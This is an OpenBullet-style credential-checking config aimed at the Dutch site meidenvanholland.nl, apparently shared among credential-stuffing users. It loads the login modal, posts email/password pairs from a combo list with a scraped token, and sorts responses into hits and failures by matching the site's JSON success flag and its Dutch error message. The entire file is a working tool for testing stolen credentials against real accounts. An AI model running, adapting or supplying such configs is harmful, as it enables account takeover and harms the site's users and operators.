[SETTINGS]
{
  "Name": "MeidenvanHolland",
  "SuggestedBots": 1,
  "LastModified": "2018-06-27T22:40:43.5550816+00:00",
  "AdditionalInfo": "",
  "Author": "v0ilawes",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_LOGIN_PAGE REQUEST GET "http://www.meidenvanholland.nl/app/partials/login-register-modal.html?cachePrev=1530138222.642" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#POST_LOGIN REQUEST POST "http://www.meidenvanholland.nl/user/login" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>&_token=<_TOKEN>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
PARSE "<SOURCE>" LR "{\"error\":false,\"data\":{\"logged_in\":true,\"username\":\"" "}}" Recursive=FALSE -> CAP "" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Onjuist e-mailadres, gebruikersnaam of wachtwoord" 
  KEYCHAIN Success OR 
    KEY "{\"error\":false" 
